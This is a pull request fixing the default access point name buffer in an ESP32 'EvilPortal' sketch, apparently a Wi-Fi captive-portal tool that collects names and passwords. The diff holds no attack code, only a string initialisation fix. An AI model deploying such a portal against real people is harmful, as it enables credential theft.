### PR TITLE
AP name fix

### DIFF
--- a/esp32/EvilPortal/EvilPortal.ino
+++ b/esp32/EvilPortal/EvilPortal.ino
@@ -30,7 +30,7 @@ String password;
 bool name_received = false;
 bool password_received = false;
 
-char apName[30] = "PORTAL";
+char apName[30] = "";
 char index_html[MAX_HTML_SIZE] = "TEST";
 
 // RESET


### PR DESCRIPTION
Remove name from char to allow AP names from 1 character.
There is a bug using 5 or less character name that catch PORTAL characters. Example to reproduce:
ap name = AAAAA
generated ap name in app= AAAAAL